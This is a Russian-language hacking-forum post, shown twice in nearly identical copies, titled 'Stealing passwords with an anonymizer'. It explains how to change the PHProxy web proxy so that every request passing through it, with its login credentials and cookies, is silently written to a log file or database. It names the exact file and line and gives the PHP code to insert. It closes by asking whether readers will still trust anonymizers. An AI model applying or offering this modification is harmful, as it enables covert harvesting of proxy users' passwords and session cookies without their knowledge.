bul.666
30.10.2006, 17:38
Вообщем буду краток...
Воруем пароли с помощью анонимайзера
Недавно решил написать анонимайзер... Но так и не начал, так как появилась другая идея! Вести лог запросов с моего анонимайзера... Ведь там хрогиться много чего интересного, например Наши куки, да что куки там пароль в открытом виде! =)
Например: Мы зашли на форум античата через скирпт и сразу пошли авторизоваться... При авторизации отправляемый пакет выглядит следующим образом:
POST /login.php HTTP/1.0
Host: forum.antichat.ru:80
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1) Gecko/20061010 Firefox/2.0
Referer: http://forum.antichat.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
vb_login_username=[НАШ_ЛОГИН]&vb_login_password=[НАШ ПАРОЛЬ]&cookieuser=1&do=login&forceredirect=1&vb_login_md5password=
Как видно наш пароль виден! (с)
Поэтому не решил заморачиваться писать его, а просто изменил уже готовый...
Я взял PHProxy 0.4 (Взять его можно тут (http://whitefyre.com/poxy/) )
Начал изучать его работу и искал место, где он отправляет пакеты на сервер... Это место я нашел! (Действительно, писал бы я ето, еслиб не нашел?...) =)
В файле PHProxy.class.php на линии 713.
$this->request_headers = $headers;
Тут все данные собираются в одну переменну, т.е. в готовый пакет... Именно этот пакет то нам и нужен...
Осталось тока его сохранять в файл при каждой отправке... Делается это просто:
$txt = fopen ("log.txt","a");
fputs($txt,$headers."\r\n=================================\r\n");
fclose($txt);
Теперь все пакеты будут отправляться на сервер и одновременно записоваться в лог...
Конечно txt файл не очень удобен, но им и не ограничевается! Можно создать базу данных, куда будут запихиваться пакеты... Для удобства можно, чтобы каждая таблица имела имя хоста а вней уже все пакеты с него... Вообщем простор есть =)
ЗЫ. Сразу скажу, что PHProxy использовал на апаче, причем удачно, на сайты не загружал =)
вы можете использовать любой другой анонимайзер =)
ЗЗЫ. Извиняюсь, если криво оформлено, или подобная статья уже есть... Или если это вообще бред... =)
Думаю и статьей это трудно назвать...
Интересно станите ли вы доверять им после прочтенного?
(с) bul666
Воруем пароли с помощью анонимайзера
Недавно решил написать анонимайзер... Но так и не начал, так как появилась другая идея! Вести лог запросов с моего анонимайзера... Ведь там хрогиться много чего интересного, например Наши куки, да что куки там пароль в открытом виде! =)
Например: Мы зашли на форум античата через скирпт и сразу пошли авторизоваться... При авторизации отправляемый пакет выглядит следующим образом:
POST /login.php HTTP/1.0
Host: forum.antichat.ru:80
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1) Gecko/20061010 Firefox/2.0
Referer: http://forum.antichat.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
vb_login_username=[НАШ_ЛОГИН]&vb_login_password=[НАШ ПАРОЛЬ]&cookieuser=1&do=login&forceredirect=1&vb_login_md5password=
Как видно наш пароль виден! (с)
Поэтому не решил заморачиваться писать его, а просто изменил уже готовый...
Я взял PHProxy 0.4 (Взять его можно тут (http://whitefyre.com/poxy/) )
Начал изучать его работу и искал место, где он отправляет пакеты на сервер... Это место я нашел! (Действительно, писал бы я ето, еслиб не нашел?...) =)
В файле PHProxy.class.php на линии 713.
Тут все данные собираются в одну переменну, т.е. в готовый пакет... Именно этот пакет то нам и нужен...
Осталось тока его сохранять в файл при каждой отправке... Делается это просто:
$txt = fopen ("log.txt","a");
fputs($txt,$headers."\r\n=================================\r\n");
fclose($txt);
Теперь все пакеты будут отправляться на сервер и одновременно записоваться в лог...
Конечно txt файл не очень удобен, но им и не ограничевается! Можно создать базу данных, куда будут запихиваться пакеты... Для удобства можно, чтобы каждая таблица имела имя хоста а вней уже все пакеты с него... Вообщем простор есть =)
ЗЫ. Сразу скажу, что PHProxy использовал на апаче, причем удачно, на сайты не загружал =)
вы можете использовать любой другой анонимайзер =)
ЗЗЫ. Извиняюсь, если криво оформлено, или подобная статья уже есть... Или если это вообще бред... =)
Думаю и статьей это трудно назвать...
Интересно станите ли вы доверять им после прочтенного?
(с) bul666